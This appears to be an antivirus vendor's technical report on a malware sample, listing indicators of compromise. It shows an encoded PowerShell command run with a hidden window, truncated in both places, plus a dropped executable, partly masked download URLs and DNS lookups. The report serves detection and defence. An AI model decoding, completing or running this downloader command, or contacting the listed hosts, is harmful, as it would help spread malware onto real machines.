Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABuAGUAdQB2AHMAZQBpAG0AdgB1AGEAbgBmAG8AZQBzAHkAbwBsAD0AJwBjAGgAaQBlAHkAbgB1AHUAdwByAGUAZQBsAG0AYQBpAGgAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAUwBlAG...
- %HOMEPATH%\979.exe
- 'vi##.com':443
- http://bs##000.com/aspnet_client/bw/
- http://ba###boom.com/zxwxo/qkm/
- DNS ASK bs##000.com
- DNS ASK ba###boom.com
- DNS ASK co######ptingbangkok.clinic
- DNS ASK vi##.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABuAGUAdQB2AHMAZQBpAG0AdgB1AGEAbgBmAG8AZQBzAHkAbwBsAD0AJwBjAGgAaQBlAHkAbgB1AHUAdwByAGUAZQBsAG0AYQBpAGgAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAUwBlAG...' (со скрытым окном)